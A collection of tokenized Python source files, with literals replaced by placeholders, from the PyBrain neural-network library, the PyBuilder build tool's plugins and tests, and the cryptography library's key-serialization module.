<s> __author__ = '<STR_LIT>' <EOL> from pybrain . rl . learners . learner import Learner <EOL> class MetaLearner ( Learner ) : <EOL> """<STR_LIT>""" </s>
<s> __author__ = '<STR_LIT>' <EOL> from pybrain . utilities import iterCombinations , Named <EOL> from pybrain . structure . moduleslice import ModuleSlice <EOL> from functools import reduce <EOL> class ModuleMesh ( Named ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , constructor , dimensions , name = None , baserename = False ) : <EOL> """<STR_LIT>""" <EOL> self . dims = dimensions <EOL> if name != None : <EOL> self . name = name <EOL> self . components = { } <EOL> for coord in iterCombinations ( self . dims ) : <EOL> tmp = constructor ( ) <EOL> self . components [ coord ] = tmp <EOL> tmp . name = self . name + str ( coord ) <EOL> if baserename and isinstance ( tmp , ModuleSlice ) : <EOL> tmp . base . name = tmp . name <EOL> self . componentIndim = tmp . indim <EOL> self . componentOutdim = tmp . outdim <EOL> @ staticmethod <EOL> def constructWithLayers ( layerclass , layersize , dimensions , name = None ) : <EOL> """<STR_LIT>""" <EOL> c = lambda : layerclass ( layersize ) <EOL> return ModuleMesh ( c , dimensions , name ) <EOL> @ staticmethod <EOL> def viewOnFlatLayer ( layer , dimensions , name = None ) : <EOL> """<STR_LIT>""" <EOL> assert max ( dimensions ) > <NUM_LIT:1> , "<STR_LIT>" <EOL> def slicer ( ) : <EOL> nbunits = reduce ( lambda x , y : x * y , dimensions , <NUM_LIT:1> ) <EOL> insize = layer . indim // nbunits <EOL> outsize = layer . outdim // nbunits <EOL> for index in range ( nbunits ) : <EOL> yield ModuleSlice ( layer , insize * index , insize * ( index + <NUM_LIT:1> ) , outsize * index , outsize * ( index + <NUM_LIT:1> ) ) <EOL> c = slicer ( ) <EOL> return ModuleMesh ( lambda : next ( c ) , dimensions , name ) <EOL> def __iter__ ( self ) : <EOL> for coord in iterCombinations ( self . dims ) : <EOL> yield self . components [ coord ] <EOL> def __getitem__ ( self , coord ) : <EOL> return self . components [ coord ] </s>
<s> __author__ = '<STR_LIT>' <EOL> import random <EOL> from pybrain import SharedFullConnection , MotherConnection , MDLSTMLayer , IdentityConnection <EOL> from pybrain import ModuleMesh , LinearLayer , TanhLayer , SigmoidLayer <EOL> from pybrain . structure . networks import BorderSwipingNetwork <EOL> class CaptureGameNetwork ( BorderSwipingNetwork ) : <EOL> """<STR_LIT>""" <EOL> size = <NUM_LIT:5> <EOL> insize = <NUM_LIT:2> <EOL> hsize = <NUM_LIT:5> <EOL> predefined = None <EOL> directlink = False <EOL> componentclass = TanhLayer <EOL> outcomponentclass = SigmoidLayer <EOL> peepholes = False <EOL> outputs = <NUM_LIT:1> <EOL> comboutputs = <NUM_LIT:0> <EOL> combinputs = <NUM_LIT:0> <EOL> rebuilt = False <EOL> def __init__ ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:size>' in args : <EOL> self . size = args [ '<STR_LIT:size>' ] <EOL> args [ '<STR_LIT>' ] = ( self . size , self . size ) <EOL> assert self . size > <NUM_LIT:1> , '<STR_LIT>' <EOL> BorderSwipingNetwork . __init__ ( self , ** args ) <EOL> if not self . rebuilt : <EOL> self . _buildCaptureNetwork ( ) <EOL> self . sortModules ( ) <EOL> self . rebuilt = True <EOL> self . setArgs ( rebuilt = True ) <EOL> def _buildCaptureNetwork ( self ) : <EOL> inmod = LinearLayer ( self . insize * self . size * self . size , name = '<STR_LIT:input>' ) <EOL> inmesh = ModuleMesh . viewOnFlatLayer ( inmod , ( self . size , self . size ) , '<STR_LIT>' ) <EOL> outmod = self . outcomponentclass ( self . outputs * self . size * self . size , name = '<STR_LIT>' ) <EOL> outmesh = ModuleMesh . viewOnFlatLayer ( outmod , ( self . size , self . size ) , '<STR_LIT>' ) <EOL> if self . componentclass is MDLSTMLayer : <EOL> c = lambda : MDLSTMLayer ( self . hsize , <NUM_LIT:2> , self . peepholes ) . meatSlice ( ) <EOL> hiddenmesh = ModuleMesh ( c , ( self . size , self . size , <NUM_LIT:4> ) , '<STR_LIT>' , baserename = True ) <EOL> else : <EOL> hiddenmesh = ModuleMesh . constructWithLayers ( self . componentclass , self . hsize , ( self . size , self . size , <NUM_LIT:4> ) , '<STR_LIT>' ) <EOL> self . _buildBorderStructure ( inmesh , hiddenmesh , outmesh ) <EOL> for m in self . modules : <EOL> if isinstance ( m , MDLSTMLayer ) : <EOL> tmp = m . stateSlice ( ) <EOL> index = <NUM_LIT:0> <EOL> for c in list ( self . connections [ m ] ) : <EOL> if isinstance ( c . outmod , MDLSTMLayer ) : <EOL> self . addConnection ( IdentityConnection ( tmp , c . outmod . stateSlice ( ) , <EOL> outSliceFrom = self . hsize * ( index ) , <EOL> outSliceTo = self . hsize * ( index + <NUM_LIT:1> ) ) ) <EOL> index += <NUM_LIT:1> <EOL> if self . directlink : <EOL> self . _buildDirectLink ( inmesh , outmesh ) <EOL> if self . combinputs > <NUM_LIT:0> : <EOL> cin = LinearLayer ( self . combinputs , name = '<STR_LIT>' ) <EOL> self . addInputModule ( cin ) <EOL> if '<STR_LIT>' not in self . predefined : <EOL> self . predefined [ '<STR_LIT>' ] = MotherConnection ( cin . componentOutdim * hiddenmesh . componentIndim , '<STR_LIT>' ) <EOL> self . _linkToAll ( cin , hiddenmesh , self . predefined [ '<STR_LIT>' ] ) <EOL> def _buildDirectLink ( self , inmesh , outmesh ) : <EOL> if not '<STR_LIT>' in self . predefined : <EOL> self . predefined [ '<STR_LIT>' ] = MotherConnection ( inmesh . componentOutdim * outmesh . componentIndim , '<STR_LIT>' ) <EOL> for unit in self . _iterateOverUnits ( ) : <EOL> self . addConnection ( SharedFullConnection ( self . predefined [ '<STR_LIT>' ] , inmesh [ unit ] , outmesh [ unit ] ) ) <EOL> def _linkToAll ( self , inmod , mesh , conn ) : <EOL> for unit in self . _iterateOverUnits ( ) : <EOL> self . addConnection ( SharedFullConnection ( conn , inmod , mesh [ unit ] ) ) <EOL> def _generateName ( self ) : <EOL> """<STR_LIT>""" <EOL> name = self . __class__ . __name__ <EOL> name += '<STR_LIT>' + str ( self . size ) <EOL> name += '<STR_LIT>' + str ( self . hsize ) <EOL> if self . directlink : <EOL> name += '<STR_LIT>' <EOL> if self . componentclass != TanhLayer : <EOL> name += '<STR_LIT:->' + self . componentclass . __name__ <EOL> if self . outputs > <NUM_LIT:1> : <EOL> name += '<STR_LIT>' + str ( self . outputs ) <EOL> if self . combinputs > <NUM_LIT:0> : <EOL> name += '<STR_LIT>' + str ( self . combinputs ) <EOL> name += '<STR_LIT>' + str ( int ( random . random ( ) * <NUM_LIT> + <NUM_LIT> ) ) <EOL> return name <EOL> def resizedTo ( self , newsize ) : <EOL> """<STR_LIT>""" <EOL> if newsize == self . size : <EOL> return self . copy ( ) <EOL> else : <EOL> import copy <EOL> for mc in self . motherconnections : <EOL> mc . owner = None <EOL> cdict = copy . deepcopy ( self . predefined ) <EOL> args = self . argdict . copy ( ) <EOL> args [ '<STR_LIT:size>' ] = newsize <EOL> del args [ '<STR_LIT>' ] <EOL> for mc in self . motherconnections : <EOL> mc . owner = self <EOL> return CaptureGameNetwork ( predefined = cdict , ** args ) </s>
<s> __author__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> from pybrain . utilities import Named , abstractMethod <EOL> class Trainer ( Named ) : <EOL> """<STR_LIT>""" <EOL> ds = None <EOL> module = None <EOL> def __init__ ( self , module ) : <EOL> self . module = module <EOL> def setData ( self , dataset ) : <EOL> """<STR_LIT>""" <EOL> self . ds = dataset <EOL> if dataset : <EOL> assert dataset . indim == self . module . indim <EOL> assert dataset . outdim == self . module . outdim <EOL> def trainOnDataset ( self , dataset , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . setData ( dataset ) <EOL> self . trainEpochs ( * args , ** kwargs ) <EOL> def trainEpochs ( self , epochs = <NUM_LIT:1> , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for dummy in range ( epochs ) : <EOL> self . train ( * args , ** kwargs ) <EOL> def train ( self ) : <EOL> """<STR_LIT>""" <EOL> abstractMethod ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from pybrain . structure import RecurrentNetwork <EOL> from pybrain import LinearLayer , FullConnection <EOL> from pybrain . tools . shortcuts import buildNetwork <EOL> from pybrain . tests import runModuleTestSuite <EOL> def buildMixedNestedNetwork ( ) : <EOL> """<STR_LIT>""" <EOL> N = RecurrentNetwork ( '<STR_LIT>' ) <EOL> a = LinearLayer ( <NUM_LIT:1> , name = '<STR_LIT:a>' ) <EOL> b = LinearLayer ( <NUM_LIT:2> , name = '<STR_LIT:b>' ) <EOL> c = buildNetwork ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> c . name = '<STR_LIT>' <EOL> N . addInputModule ( a ) <EOL> N . addModule ( c ) <EOL> N . addOutputModule ( b ) <EOL> N . addConnection ( FullConnection ( a , b ) ) <EOL> N . addConnection ( FullConnection ( b , c ) ) <EOL> N . addRecurrentConnection ( FullConnection ( c , c ) ) <EOL> N . sortModules ( ) <EOL> return N <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> runModuleTestSuite ( __import__ ( '<STR_LIT:__main__>' ) ) </s>
<s> from __future__ import print_function <EOL> from pickle import load , dump <EOL> from scipy import array , sqrt <EOL> from pylab import errorbar , show <EOL> class ExTools ( ) : <EOL> agent = None <EOL> loadName = "<STR_LIT>" <EOL> saveName = "<STR_LIT>" <EOL> resuName = "<STR_LIT>" <EOL> rl = [ ] <EOL> rll = [ ] <EOL> def __init__ ( self , batch = <NUM_LIT:2> , prnts = <NUM_LIT:1> , kind = "<STR_LIT>" ) : <EOL> self . batch = batch <EOL> self . prnts = prnts <EOL> self . kind = kind <EOL> def loadWeights ( self , filename ) : <EOL> filepointer = open ( filename ) <EOL> self . agent . learner . current = load ( filepointer ) <EOL> filepointer . close ( ) <EOL> self . agent . learner . gd . init ( self . agent . learner . current ) <EOL> self . agent . learner . epsilon = <NUM_LIT> <EOL> self . agent . learner . initSigmas ( ) <EOL> def saveWeights ( self , filename , w ) : <EOL> filepointer = open ( filename , '<STR_LIT>' ) <EOL> dump ( w , filepointer ) <EOL> filepointer . close ( ) <EOL> def saveResults ( self , filename , results ) : <EOL> filepointer = open ( filename , '<STR_LIT>' ) <EOL> dump ( results , filepointer ) <EOL> filepointer . close ( ) <EOL> def printResults ( self , resList , runs , updates ) : <EOL> if self . kind == "<STR_LIT>" : <EOL> rLen = len ( resList ) <EOL> avReward = array ( resList ) . sum ( ) / rLen <EOL> print ( ( "<STR_LIT>" , self . agent . learner . _bestFound ( ) ) ) <EOL> print ( ( "<STR_LIT>" , runs , <EOL> "<STR_LIT>" , ( updates + <NUM_LIT:1> ) * self . batch * self . prnts , <EOL> "<STR_LIT>" , self . agent . learner . bestEvaluation , <EOL> "<STR_LIT>" , avReward ) ) <EOL> print ( ) <EOL> self . rl . append ( avReward ) <EOL> else : <EOL> avReward = resList <EOL> print ( ( <EOL> "<STR_LIT>" , runs , "<STR_LIT:/>" , ( updates + <NUM_LIT:1> ) * self . batch * self . prnts , <EOL> "<STR_LIT>" , avReward ) ) <EOL> self . rl . append ( avReward ) <EOL> def addExps ( self ) : <EOL> self . rll . append ( self . rl ) <EOL> self . rl = [ ] <EOL> def showExps ( self ) : <EOL> nEx = len ( self . rll ) <EOL> self . rll = array ( self . rll ) <EOL> r = self . rll . sum ( axis = <NUM_LIT:0> ) / nEx <EOL> d = self . rll - r <EOL> v = ( d ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:0> ) <EOL> v = v / nEx <EOL> stand = sqrt ( v ) <EOL> errorbar ( array ( list ( range ( len ( self . rll [ <NUM_LIT:0> ] ) ) ) ) * self . prnts * self . batch + self . prnts * self . batch , r , stand ) <EOL> show ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> test_suite = '<STR_LIT>' , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> install_requires = [ "<STR_LIT>" ] , <EOL> ) </s>
<s> import unittest <EOL> from integrationtest_support import IntegrationTestSupport <EOL> from pybuilder . errors import ProjectValidationFailedException <EOL> class Test ( IntegrationTestSupport ) : <EOL> def test ( self ) : <EOL> self . write_build_file ( """<STR_LIT>""" ) <EOL> reactor = self . prepare_reactor ( ) <EOL> self . assertRaises ( <EOL> ProjectValidationFailedException , reactor . build , [ "<STR_LIT>" ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import string <EOL> from pybuilder . core import init , after , use_plugin <EOL> from pybuilder . utils import apply_on_files , read_file , write_file <EOL> use_plugin ( "<STR_LIT>" ) <EOL> @ init <EOL> def init_filter_resources_plugin ( project ) : <EOL> project . set_property_if_unset ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , [ ] ) <EOL> @ after ( "<STR_LIT>" , only_once = True ) <EOL> def filter_resources ( project , logger ) : <EOL> globs = project . get_mandatory_property ( "<STR_LIT>" ) <EOL> if not globs : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> return <EOL> target = project . expand_path ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( globs ) , target ) <EOL> project_dict_wrapper = ProjectDictWrapper ( project , logger ) <EOL> apply_on_files ( target , filter_resource , globs , project_dict_wrapper , logger ) <EOL> def filter_resource ( absolute_file_name , relative_file_name , dictionary , logger ) : <EOL> logger . debug ( "<STR_LIT>" , absolute_file_name ) <EOL> content = "<STR_LIT>" . join ( read_file ( absolute_file_name ) ) <EOL> filtered = string . Template ( content ) . safe_substitute ( dictionary ) <EOL> write_file ( absolute_file_name , filtered ) <EOL> class ProjectDictWrapper ( object ) : <EOL> def __init__ ( self , project , logger ) : <EOL> self . project = project <EOL> self . logger = logger <EOL> def __getitem__ ( self , key ) : <EOL> fallback_when_no_substitution_possible = "<STR_LIT>" % key <EOL> if hasattr ( self . project , key ) : <EOL> return getattr ( self . project , key ) <EOL> if self . project . has_property ( key ) : <EOL> return self . project . get_property ( key ) <EOL> self . logger . warn ( <EOL> "<STR_LIT>" . format ( key ) ) <EOL> return fallback_when_no_substitution_possible </s>
<s> from __future__ import unicode_literals <EOL> try : <EOL> from StringIO import StringIO <EOL> except ImportError as e : <EOL> from io import StringIO <EOL> import sys <EOL> import unittest <EOL> from pybuilder . core import init , task , description , use_plugin <EOL> from pybuilder . errors import BuildFailedException <EOL> from pybuilder . utils import discover_modules_matching , render_report , fork_process <EOL> from pybuilder . ci_server_interaction import test_proxy_for <EOL> from pybuilder . terminal import print_text_line <EOL> from types import MethodType , FunctionType <EOL> from functools import reduce <EOL> use_plugin ( "<STR_LIT>" ) <EOL> @ init <EOL> def init_test_source_directory ( project ) : <EOL> if sys . version_info [ : <NUM_LIT:2> ] <= ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> project . plugin_depends_on ( "<STR_LIT>" ) <EOL> else : <EOL> project . plugin_depends_on ( "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , None ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , None ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , ( <EOL> lambda stream : __import__ ( "<STR_LIT>" ) . XMLTestRunner ( output = project . expand_path ( "<STR_LIT>" ) , <EOL> stream = stream ) , "<STR_LIT>" ) ) <EOL> @ task <EOL> @ description ( "<STR_LIT>" ) <EOL> def run_unit_tests ( project , logger ) : <EOL> run_tests ( project , logger , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def run_tests ( project , logger , execution_prefix , execution_name ) : <EOL> logger . info ( "<STR_LIT>" , execution_name ) <EOL> if not project . get_property ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" , execution_name ) <EOL> exit_code , _ = fork_process ( logger , <EOL> target = do_run_tests , <EOL> args = ( <EOL> project , logger , execution_prefix , execution_name ) ) <EOL> if exit_code : <EOL> raise BuildFailedException ( <EOL> "<STR_LIT>" % ( execution_name , exit_code ) ) <EOL> else : <EOL> do_run_tests ( project , logger , execution_prefix , execution_name ) <EOL> def do_run_tests ( project , logger , execution_prefix , execution_name ) : <EOL> test_dir = _register_test_and_source_path_and_return_test_dir ( project , sys . path , execution_prefix ) <EOL> file_suffix = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> if file_suffix is not None : <EOL> logger . warn ( <EOL> "<STR_LIT>" % { "<STR_LIT>" : execution_prefix } ) <EOL> module_glob = "<STR_LIT>" . format ( file_suffix ) <EOL> if module_glob . endswith ( "<STR_LIT>" ) : <EOL> WITHOUT_DOT_PY = slice ( <NUM_LIT:0> , - <NUM_LIT:3> ) <EOL> module_glob = module_glob [ WITHOUT_DOT_PY ] <EOL> project . set_property ( "<STR_LIT>" % execution_prefix , module_glob ) <EOL> else : <EOL> module_glob = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> logger . info ( "<STR_LIT>" , execution_name , test_dir ) <EOL> logger . debug ( "<STR_LIT>" , module_glob ) <EOL> try : <EOL> test_method_prefix = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> runner_generator = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> result , console_out = execute_tests_matching ( runner_generator , logger , test_dir , module_glob , <EOL> test_method_prefix ) <EOL> if result . testsRun == <NUM_LIT:0> : <EOL> logger . warn ( "<STR_LIT>" , execution_name ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" , result . testsRun , execution_name ) <EOL> write_report ( execution_prefix , project , logger , result , console_out ) <EOL> if not result . wasSuccessful ( ) : <EOL> raise BuildFailedException ( "<STR_LIT>" <EOL> % ( len ( result . errors ) , len ( result . failures ) , execution_name ) ) <EOL> logger . info ( "<STR_LIT>" , execution_name ) <EOL> except ImportError as e : <EOL> import traceback <EOL> _ , _ , import_error_traceback = sys . exc_info ( ) <EOL> file_with_error , error_line , _ , statement_causing_error = traceback . extract_tb ( import_error_traceback ) [ - <NUM_LIT:1> ] <EOL> logger . error ( "<STR_LIT>" . format ( <EOL> file_with_error , statement_causing_error , error_line ) ) <EOL> logger . error ( "<STR_LIT>" , execution_prefix , e ) <EOL> raise BuildFailedException ( "<STR_LIT>" % execution_name ) <EOL> def execute_tests ( runner_generator , logger , test_source , suffix , test_method_prefix = None ) : <EOL> return execute_tests_matching ( runner_generator , logger , test_source , "<STR_LIT>" . format ( suffix ) , test_method_prefix ) <EOL> def execute_tests_matching ( runner_generator , logger , test_source , file_glob , test_method_prefix = None ) : <EOL> output_log_file = StringIO ( ) <EOL> try : <EOL> test_modules = discover_modules_matching ( test_source , file_glob ) <EOL> loader = unittest . defaultTestLoader <EOL> if test_method_prefix : <EOL> loader . testMethodPrefix = test_method_prefix <EOL> tests = loader . loadTestsFromNames ( test_modules ) <EOL> result = _instrument_runner ( runner_generator , logger , _create_runner ( runner_generator , output_log_file ) ) . run ( <EOL> tests ) <EOL> return result , output_log_file . getvalue ( ) <EOL> finally : <EOL> output_log_file . close ( ) <EOL> def _create_runner ( runner_generator , output_log_file = None ) : <EOL> if ( isinstance ( runner_generator , list ) or isinstance ( runner_generator , tuple ) ) and len ( runner_generator ) > <NUM_LIT:1> : <EOL> runner_generator = runner_generator [ <NUM_LIT:0> ] <EOL> if not hasattr ( runner_generator , '<STR_LIT>' ) : <EOL> runner_generator = reduce ( getattr , runner_generator . split ( "<STR_LIT:.>" ) , sys . modules [ __name__ ] ) <EOL> return runner_generator ( stream = output_log_file ) <EOL> def _get_make_result_method_name ( runner_generator ) : <EOL> if ( isinstance ( runner_generator , list ) or isinstance ( runner_generator , tuple ) ) and len ( runner_generator ) > <NUM_LIT:1> : <EOL> method = runner_generator [ <NUM_LIT:1> ] <EOL> if type ( method ) == MethodType or type ( method ) == FunctionType : <EOL> method = method . __name__ <EOL> else : <EOL> method = "<STR_LIT>" <EOL> return method <EOL> def _instrument_runner ( runner_generator , logger , runner ) : <EOL> method_name = _get_make_result_method_name ( runner_generator ) <EOL> old_make_result = getattr ( runner , method_name ) <EOL> runner . logger = logger <EOL> def _instrumented_make_result ( self ) : <EOL> result = old_make_result ( ) <EOL> return _instrument_result ( logger , result ) <EOL> setattr ( runner , method_name , MethodType ( _instrumented_make_result , runner ) ) <EOL> return runner <EOL> def _instrument_result ( logger , result ) : <EOL> old_startTest = result . startTest <EOL> old_addError = result . addError <EOL> old_addFailure = result . addFailure <EOL> def startTest ( self , test ) : <EOL> self . test_names . append ( test ) <EOL> self . logger . debug ( "<STR_LIT>" , test ) <EOL> old_startTest ( test ) <EOL> def addError ( self , test , err ) : <EOL> exception_type , exception , traceback = err <EOL> self . failed_test_names_and_reasons [ test ] = '<STR_LIT>' . format ( exception_type , exception ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> old_addError ( test , err ) <EOL> def addFailure ( self , test , err ) : <EOL> exception_type , exception , traceback = err <EOL> self . failed_test_names_and_reasons [ test ] = '<STR_LIT>' . format ( exception_type , exception ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> old_addFailure ( test , err ) <EOL> result . startTest = MethodType ( startTest , result ) <EOL> result . addError = MethodType ( addError , result ) <EOL> result . addFailure = MethodType ( addFailure , result ) <EOL> result . test_names = [ ] <EOL> result . failed_test_names_and_reasons = { } <EOL> result . logger = logger <EOL> return result <EOL> def _register_test_and_source_path_and_return_test_dir ( project , system_path , execution_prefix ) : <EOL> test_dir = project . expand_path ( "<STR_LIT>" % execution_prefix ) <EOL> system_path . insert ( <NUM_LIT:0> , test_dir ) <EOL> system_path . insert ( <NUM_LIT:0> , project . expand_path ( "<STR_LIT>" ) ) <EOL> return test_dir <EOL> def write_report ( name , project , logger , result , console_out ) : <EOL> project . write_report ( "<STR_LIT:%s>" % name , console_out ) <EOL> report = { "<STR_LIT>" : result . testsRun , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] } <EOL> for error in result . errors : <EOL> report [ "<STR_LIT>" ] . append ( { "<STR_LIT:test>" : error [ <NUM_LIT:0> ] . id ( ) , <EOL> "<STR_LIT>" : error [ <NUM_LIT:1> ] } ) <EOL> logger . error ( "<STR_LIT>" , error [ <NUM_LIT:0> ] . id ( ) ) <EOL> if project . get_property ( "<STR_LIT>" ) : <EOL> print_text_line ( error [ <NUM_LIT:1> ] ) <EOL> for failure in result . failures : <EOL> report [ "<STR_LIT>" ] . append ( { "<STR_LIT:test>" : failure [ <NUM_LIT:0> ] . id ( ) , <EOL> "<STR_LIT>" : failure [ <NUM_LIT:1> ] } ) <EOL> logger . error ( "<STR_LIT>" , failure [ <NUM_LIT:0> ] . id ( ) ) <EOL> if project . get_property ( "<STR_LIT>" ) : <EOL> print_text_line ( failure [ <NUM_LIT:1> ] ) <EOL> project . write_report ( "<STR_LIT>" % name , render_report ( report ) ) <EOL> report_to_ci_server ( project , result ) <EOL> def report_to_ci_server ( project , result ) : <EOL> for test_name in result . test_names : <EOL> with test_proxy_for ( project ) . and_test_name ( test_name ) as test : <EOL> if test_name in result . failed_test_names_and_reasons : <EOL> test . fails ( result . failed_test_names_and_reasons . get ( test_name ) ) </s>
<s> try : <EOL> TYPE_FILE = file <EOL> except NameError : <EOL> from io import FileIO as TYPE_FILE <EOL> import unittest <EOL> from test_utils import patch , Mock , MagicMock <EOL> from pybuilder . core import Project <EOL> from pybuilder . plugins . python . pycharm_plugin import ( <EOL> pycharm_generate , <EOL> _ensure_directory_present <EOL> ) <EOL> class PycharmPluginTests ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_create_pycharm_directory_if_not_present ( self , os ) : <EOL> os . path . exists . return_value = False <EOL> _ensure_directory_present ( '<STR_LIT:foo>' ) <EOL> os . makedirs . assert_called_with ( '<STR_LIT:foo>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_not_create_pycharm_directory_if_present ( self , os ) : <EOL> os . path . exists . return_value = True <EOL> _ensure_directory_present ( '<STR_LIT:foo>' ) <EOL> self . assertFalse ( os . makedirs . called ) <EOL> @ patch ( '<STR_LIT>' , create = True ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_write_pycharm_file ( self , os , mock_open ) : <EOL> project = Project ( '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> project . set_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> project . set_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> project . set_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mock_open . return_value = MagicMock ( spec = TYPE_FILE ) <EOL> os . path . join . side_effect = lambda first , second : first + '<STR_LIT:/>' + second <EOL> pycharm_generate ( project , Mock ( ) ) <EOL> mock_open . assert_called_with ( '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> metadata_file = mock_open . return_value . __enter__ . return_value <EOL> metadata_file . write . assert_called_with ( """<STR_LIT>""" ) </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import abc <EOL> import base64 <EOL> import struct <EOL> from enum import Enum <EOL> import six <EOL> from cryptography import utils <EOL> from cryptography . exceptions import UnsupportedAlgorithm <EOL> from cryptography . hazmat . primitives . asymmetric import dsa , ec , rsa <EOL> def load_pem_private_key ( data , password , backend ) : <EOL> return backend . load_pem_private_key ( data , password ) <EOL> def load_pem_public_key ( data , backend ) : <EOL> return backend . load_pem_public_key ( data ) <EOL> def load_der_private_key ( data , password , backend ) : <EOL> return backend . load_der_private_key ( data , password ) <EOL> def load_der_public_key ( data , backend ) : <EOL> return backend . load_der_public_key ( data ) <EOL> def load_ssh_public_key ( data , backend ) : <EOL> key_parts = data . split ( b'<STR_LIT:U+0020>' , <NUM_LIT:2> ) <EOL> if len ( key_parts ) < <NUM_LIT:2> : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> key_type = key_parts [ <NUM_LIT:0> ] <EOL> if key_type == b'<STR_LIT>' : <EOL> loader = _load_ssh_rsa_public_key <EOL> elif key_type == b'<STR_LIT>' : <EOL> loader = _load_ssh_dss_public_key <EOL> elif key_type in [ <EOL> b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> ] : <EOL> loader = _load_ssh_ecdsa_public_key <EOL> else : <EOL> raise UnsupportedAlgorithm ( '<STR_LIT>' ) <EOL> key_body = key_parts [ <NUM_LIT:1> ] <EOL> try : <EOL> decoded_data = base64 . b64decode ( key_body ) <EOL> except TypeError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> inner_key_type , rest = _read_next_string ( decoded_data ) <EOL> if inner_key_type != key_type : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> return loader ( key_type , rest , backend ) <EOL> def _load_ssh_rsa_public_key ( key_type , decoded_data , backend ) : <EOL> e , rest = _read_next_mpint ( decoded_data ) <EOL> n , rest = _read_next_mpint ( rest ) <EOL> if rest : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return rsa . RSAPublicNumbers ( e , n ) . public_key ( backend ) <EOL> def _load_ssh_dss_public_key ( key_type , decoded_data , backend ) : <EOL> p , rest = _read_next_mpint ( decoded_data ) <EOL> q , rest = _read_next_mpint ( rest ) <EOL> g , rest = _read_next_mpint ( rest ) <EOL> y , rest = _read_next_mpint ( rest ) <EOL> if rest : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> parameter_numbers = dsa . DSAParameterNumbers ( p , q , g ) <EOL> public_numbers = dsa . DSAPublicNumbers ( y , parameter_numbers ) <EOL> return public_numbers . public_key ( backend ) <EOL> def _load_ssh_ecdsa_public_key ( expected_key_type , decoded_data , backend ) : <EOL> curve_name , rest = _read_next_string ( decoded_data ) <EOL> data , rest = _read_next_string ( rest ) <EOL> if expected_key_type != b"<STR_LIT>" + curve_name : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if rest : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> curve = { <EOL> b"<STR_LIT>" : ec . SECP256R1 , <EOL> b"<STR_LIT>" : ec . SECP384R1 , <EOL> b"<STR_LIT>" : ec . SECP521R1 , <EOL> } [ curve_name ] ( ) <EOL> if six . indexbytes ( data , <NUM_LIT:0> ) != <NUM_LIT:4> : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> numbers = ec . EllipticCurvePublicNumbers . from_encoded_point ( curve , data ) <EOL> return numbers . public_key ( backend ) <EOL> def _read_next_string ( data ) : <EOL> """<STR_LIT>""" <EOL> if len ( data ) < <NUM_LIT:4> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> str_len , = struct . unpack ( '<STR_LIT>' , data [ : <NUM_LIT:4> ] ) <EOL> if len ( data ) < str_len + <NUM_LIT:4> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return data [ <NUM_LIT:4> : <NUM_LIT:4> + str_len ] , data [ <NUM_LIT:4> + str_len : ] <EOL> def _read_next_mpint ( data ) : <EOL> """<STR_LIT>""" <EOL> mpint_data , rest = _read_next_string ( data ) <EOL> return ( <EOL> utils . int_from_bytes ( mpint_data , byteorder = '<STR_LIT>' , signed = False ) , rest <EOL> ) <EOL> 